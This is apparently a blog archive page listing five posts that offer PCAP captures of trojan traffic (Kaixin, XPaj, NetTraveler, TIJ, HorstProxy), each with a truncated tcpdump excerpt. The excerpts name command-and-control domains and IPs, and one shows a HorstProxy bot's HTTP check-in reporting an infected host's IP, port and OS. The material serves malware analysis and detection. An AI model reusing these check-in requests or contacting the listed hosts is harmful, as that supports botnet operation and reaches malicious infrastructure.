Category Archives: Other Trojan Families

Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

Download Kaixin PCAP Sample : kaixin.pcap   2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0..@………w……P…=….p…f……….. 2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0 E..0X\..o…w……..P..8……>p.@..y………. 2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win… Read More »

Share Button

XPaj Malware Trojan Packet Analysis Download PCAP Sample

  Download XPAJ PCAP Sample : xpaj.pcap   2012-05-02 16:18:32.092414 IP 192.168.254.194.49734 > 8.8.8.8.53: 34837+ A? nortiniolosto.com. (35) E..?R……r………F.5.+……………nortiniolosto.com….. 2012-05-02 16:18:32.235179 IP 8.8.8.8.53 > 192.168.254.194.49734: 34837 1/0/0 A 208.91.198.30 (51) E..OG;..8.k……….5.F.;.)………….nortiniolosto.com………………[.. 2012-05-02 16:18:32.240585 IP 192.168.254.194.64504 > 8.8.8.8.53: 55906+ A? msn.com. (25) E..5R……{………..5.!l..b………..msn.com….. 2012-05-02 16:18:32.256362 IP 8.8.8.8.53 > 192.168.254.194.64504: 55906 1/0/0 A 65.55.206.203 (41) E..E.T..8…………5…1…b………..msn.com…………..F..A7.. 2012-05-02 16:18:32.260152… Read More »

Share Button

Nettraveler Net Traveler Data Personal Information Hijacking Malware Trojan PCAP Traffic Sample

Download raw PCAP of Nettravler : nettravler.pcap 2013-01-05 22:43:42.583158 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31) E..;.c……………5.5.’`U………….www.gami1.com….. 2013-01-05 22:43:43.577967 IP 172.16.253.130.53 > 8.8.8.8.53: 11908+ A? www.gami1.com. (31) E..;.e……………5.5.’VI………….www.gami1.com….. 2013-01-05 22:43:43.578188 IP 172.16.253.130.53 > 4.2.2.2.53: 11908+ A? www.gami1.com. (31) E..;.f……………5.5.’`U………….www.gami1.com….. 2013-01-05 22:43:44.085958 IP 4.2.2.2.53 > 172.16.253.130.53: 11908 1/0/0 A 110.34.193.13 (47) E..Kt4……………5.5.7……………www.gami1.com……………..n”. 2013-01-05 22:43:44.085985 IP 4.2.2.2.53… Read More »

Share Button

HISTORICAL Malware Sample – TIJ – Traffic Sample Indicators Analysis

2013-02-03 21:49:49.176564 IP 8.8.8.8.53 > 172.16.253.130.53: 34738 1/0/0 A 174.139.45.210 (50) E..N[Y….%……….5.5.:……………siqiao.gnway.net…………..<….-. 2013-02-03 21:49:49.179485 IP 172.16.253.130.1067 > 174.139.45.210.80: Flags [S], seq 2948849307, win 64240, options [mss 1460,nop,nop,sackOK], length 0 E..0.C@…t…….-..+.P……..p…oc………. 2013-02-03 21:49:49.284041 IP 174.139.45.210.80 > 172.16.253.130.1067: Flags [R.], seq 2525759170, ack 2948849308, win 64240, length 0 E..([Z….Y…-……P.+……..P…………. 2013-02-03 21:49:49.358483 IP 4.2.2.2.53 > 172.16.253.130.53: 34738 1/0/0… Read More »

Share Button

HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125 E….;@…i…..E+…!.P.r……P…F\..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1 User-Agent: Mozilla/5.0 Host: ldark.com     2013-05-12 14:32:23.969386 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [.], ack 126, win 64240, length 0 E..(……..E+…….P.!…..r..P…………. 2013-05-12 14:32:24.102970 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [FP.], seq 1:290, ack 126, win 64240, length… Read More »

Share Button